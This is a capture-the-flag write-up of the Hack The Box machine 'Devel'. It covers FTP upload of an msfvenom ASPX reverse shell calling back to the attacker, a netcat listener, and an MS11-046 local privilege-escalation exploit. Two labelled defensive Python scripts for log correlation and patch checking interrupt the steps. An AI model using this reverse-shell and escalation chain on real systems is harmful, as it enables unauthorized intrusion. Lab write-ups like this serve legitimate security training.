Devel — HTB
IP: 10.10.10.5
NMAP
nmap -v -A -sC -oN nmap 10.10.10.5

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 12-06-19 06:13PM 1442 cmdasp.aspx
| 03-17-17 04:37PM 689 iisstart.htm
| 12-06-19 06:09PM 6 test.txt
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Nmap also reports that anonymous login is allowed on the FTP server.
After connecting to the FTP server, we find that we have write permission on it.
There are some files on the FTP server; now let's check whether this directory is also served by the web server.
The FTP files are accessible from the web root.
Great, so it looks like we can upload files to the web root. Let's generate an ASPX reverse shell using msfvenom and upload it.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f aspx > shell.aspx
Once the reverse shell is generated, let's upload it.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (985.4465 kB/s)
We can now access this file via the browser.
Since we set LPORT to 4444 in the payload, start a netcat listener on port 4444:
nc -lvp 4444
Now it's time to request our shell.aspx to get a shell:
http://10.10.10.5/shell1.aspx (open it from your browser)
Now we get a shell on our nc listener.
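The chain above (anonymous FTP write into a directory the web server serves, then an HTTP request for the uploaded file) leaves a clear trail in IIS logs. The following detection script is an added example, not part of this writeup or of any HTB material: it parses IIS W3C-format FTP and web logs by their #Fields header and correlates completed anonymous uploads of script or binary content with later HTTP requests for the same path. All log lines below are constructed for the example; the field layouts follow IIS 7.5 defaults.

```python
"""Added detection example: correlate anonymous FTP uploads of script or
binary content with later HTTP requests for the same path in IIS W3C logs.
All log lines are constructed for this example; field layouts follow IIS 7.5."""
import re

# Constructed IIS FTP site log. Column order comes from the #Fields line,
# so the parser never hard-codes column positions.
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2019-12-06 18:08:51 10.10.14.4 - 10.10.10.5 21 ControlChannelOpened - -
2019-12-06 18:08:51 10.10.14.4 - 10.10.10.5 21 USER anonymous 331
2019-12-06 18:08:52 10.10.14.4 anonymous 10.10.10.5 21 PASS *** 230
2019-12-06 18:09:10 10.10.14.4 anonymous 10.10.10.5 21 STOR /test.txt 226
2019-12-06 18:12:30 10.10.14.4 anonymous 10.10.10.5 21 STOR /shell.aspx 226
2019-12-06 18:20:02 10.10.14.4 anonymous 10.10.10.5 21 STOR /MS11-046.exe 226
2019-12-06 18:21:15 10.10.14.4 anonymous 10.10.10.5 21 STOR /broken.aspx 550
"""

# Constructed IIS web site log for the same host (user agent is one token,
# as IIS logs it with spaces replaced by '+').
HTTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2019-12-06 18:12:58 10.10.10.5 GET /shell.aspx - 80 - 10.10.14.4 Mozilla/5.0 200 0 0 312
2019-12-06 18:13:01 10.10.10.5 GET /welcome.png - 80 - 10.10.14.4 Mozilla/5.0 200 0 0 5
2019-12-06 18:13:05 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.4 Mozilla/5.0 200 0 0 4
"""

# Extensions that IIS or the OS would execute rather than serve as static content.
SCRIPT_EXT = re.compile(r"\.(aspx?|ashx|asmx|php|jsp|exe|dll|bat|ps1)$", re.I)


def parse_w3c(text):
    """Yield one dict per record, keyed by the most recent #Fields header."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed record: skip rather than misalign columns
        yield dict(zip(fields, values))


def find_upload_then_request(ftp_text, http_text, anonymous_only=True):
    """Return the script/binary paths written over FTP and the subset that
    was requested over HTTP after the upload completed."""
    uploads = {}
    for rec in parse_w3c(ftp_text):
        if rec.get("cs-method", "").upper() not in ("STOR", "APPE"):
            continue
        if not rec.get("sc-status", "").startswith("2"):
            continue  # only transfers the server reported as complete
        if anonymous_only and rec.get("cs-username", "").lower() != "anonymous":
            continue
        path = rec["cs-uri-stem"].lower()
        if SCRIPT_EXT.search(path):
            uploads.setdefault(path, rec)  # keep the first completed write

    executed = []
    for rec in parse_w3c(http_text):
        path = rec.get("cs-uri-stem", "").lower()
        up = uploads.get(path)
        if up is None:
            continue
        upload_time = up["date"] + " " + up["time"]
        request_time = rec["date"] + " " + rec["time"]
        if request_time < upload_time:  # ISO timestamps compare as strings
            continue
        executed.append({
            "path": path,
            "uploader_ip": up["c-ip"],
            "upload_time": upload_time,
            "requester_ip": rec.get("c-ip"),
            "request_time": request_time,
            "http_status": rec.get("sc-status"),
        })
    return {"uploaded": sorted(uploads), "executed": executed}


if __name__ == "__main__":
    result = find_upload_then_request(FTP_LOG, HTTP_LOG)
    for path in result["uploaded"]:
        print("script/binary written over anonymous FTP:", path)
    for hit in result["executed"]:
        print("ALERT upload then request:", hit)
```

On the constructed logs the script reports two anonymous writes of executable content (shell.aspx and MS11-046.exe) and one upload-then-request alert for /shell.aspx; the failed STOR of broken.aspx (status 550) and the text file are ignored. The same correlation points at the mitigation: an FTP site with anonymous write access must not share its root with a web application, and the web root should not be writable by the FTP user at all.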
We are only the IIS user and do not have permission to access other users' folders,
so we have to escalate privileges.
We ran the systeminfo command to gather system information:
c:\Users>systeminfo
systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31
System Boot Time: 25/2/2019, 12:29:12
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 6 Model 63 Stepping 2 GenuineIntel ~2300 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.024 MB
Available Physical Memory: 754 MB
Virtual Memory: Max Size: 2.048 MB
Virtual Memory: Available: 1.521 MB
Virtual Memory: In Use: 527 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
The OS version is 6.1.7600 N/A Build 7600 (no service pack, and Hotfix(s) shows N/A).
Let's see if this version is vulnerable to privilege escalation.
We found an exploit for it on Exploit-DB (40564.c).
We downloaded it and compiled it with this command:
i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32
Now we have the compiled MS11-046.exe; the main work is to transfer it to the victim machine for privilege escalation.
Remember that we have write permission on the FTP server, so we send the file over FTP again.
Upload the compiled MS11-046.exe to the machine, switching the FTP client to binary mode for the transfer:
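The version check above is the same one an administrator runs in the other direction: a host whose systeminfo reports a release with no service pack and no hotfixes should stand out in inventory long before anyone tests it. The script below is an added example, not part of this writeup: it parses systeminfo output (including the indented continuation lines used for processors, hotfixes and network cards) and reports build, service pack and installed hotfixes. The first sample is the page's own DEVEL output, abridged; the second is constructed, with placeholder KB numbers.

```python
"""Added patch-state check: parse `systeminfo` output and report OS build,
service pack and installed hotfixes. DEVEL_SYSTEMINFO is the page's own
output (abridged); PATCHED_SYSTEMINFO is constructed with placeholder KBs."""
import re

DEVEL_SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Configuration:          Standalone Workstation
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 63 Stepping 2 GenuineIntel ~2300 Mhz
Virtual Memory: Max Size:  2.048 MB
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 IP address(es)
                                 [01]: 10.10.10.5
"""

# Constructed sample of a patched host; KB numbers are placeholders.
PATCHED_SYSTEMINFO = """\
Host Name:                 CONSTRUCTED-HOST
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB1111111
                           [02]: KB2222222
                           [03]: KB3333333
"""

# A key line starts in column 0 and ends its key at the first colon.
KEY_LINE = re.compile(r"^(\S[^:]*?):\s*(.*)$")


def parse_systeminfo(text):
    """Return {key: [value, continuation lines...]} from systeminfo output."""
    info = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw[0].isspace():  # indented line belongs to the previous key
            if current is not None:
                info[current].append(raw.strip())
            continue
        m = KEY_LINE.match(raw)
        if m is None:
            continue
        current = m.group(1).strip()
        info[current] = [m.group(2).strip()]
    return info


def patch_state(text):
    """Summarise version, build, service pack and hotfixes for inventory."""
    info = parse_systeminfo(text)
    version_line = info.get("OS Version", [""])[0]
    build = re.search(r"Build (\d+)", version_line)
    sp = re.search(r"Service Pack (\d+)", version_line)
    hotfixes = []
    for item in info.get("Hotfix(s)", []):
        hotfixes.extend(re.findall(r"KB\d+", item))
    return {
        "host": info.get("Host Name", ["?"])[0],
        "os_version": version_line.split()[0] if version_line else None,
        "build": build.group(1) if build else None,
        "service_pack": int(sp.group(1)) if sp else None,
        "hotfixes": hotfixes,
        "unpatched": not hotfixes,  # no hotfix at all: flag for review
    }


if __name__ == "__main__":
    for sample in (DEVEL_SYSTEMINFO, PATCHED_SYSTEMINFO):
        state = patch_state(sample)
        flag = "UNPATCHED" if state["unpatched"] else "ok"
        print(state["host"], state["os_version"], "SP", state["service_pack"],
              len(state["hotfixes"]), "hotfixes", flag)
```

For the DEVEL output the summary is build 7600, no service pack and an empty hotfix list, which is exactly the state the writeup goes on to exploit; the constructed patched host shows how the same parser reads the hotfix continuation lines.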
ftp> binary
200 Type set to I.
ftp> put MS11-046.exe
local: MS11-046.exe remote: MS11-046.exe
200 PORT command successful.
We now move to c:\inetpub\wwwroot, where our MS11-046.exe has landed.
Now we just have to run it.
Now we have administrator privileges
and can access any user's profile directory.
Got root at:
C:\Users\Administrator\Desktop>type root.txt.txt
e621a0b50************728bc72b4b
Got user at:
C:\Users\babis\Desktop>type user.txt.txt
9ecdd6a3a************ea70f4cb3e8
THANK YOU!!!!!!